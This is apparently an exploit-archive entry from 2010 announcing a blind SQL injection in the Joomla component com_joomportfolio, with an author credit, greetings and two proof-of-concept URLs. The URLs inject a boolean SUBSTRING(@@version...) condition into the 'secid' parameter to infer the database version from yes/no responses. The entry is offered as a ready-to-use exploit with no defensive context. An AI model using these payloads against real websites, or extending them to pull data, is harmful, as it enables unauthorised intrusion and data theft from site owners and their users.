[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component com_joomportfolio Blind Injection Vulnerability
# Published : 2010-02-15
# Author : Snakespc
# Previous Title : blog ink Bypass Setting Vulnerability
# Next Title : Joomla Component com_hdvideoshare Sql Injection Vulnerability


==============================================================================
[?] Joomla com_joomportfolio Remote Blind Injection Vulnerability
==============================================================================
   
[?] Script:   [Joomla]
[?] Language: [ PHP ]
[?] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
[?] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]
   
###########################################################################
 ===[ Exploit ]===
   
[?] http://server/index.php?option=com_joomportfolio&task=showsec&Itemid=44&secid=1+AND SUBSTRING(@@version,1,1)=4 (no)
[?] http://server/index.php?option=com_joomportfolio&task=showsec&Itemid=44&secid=1+AND SUBSTRING(@@version,1,1)=5 (yes)
###########################################################################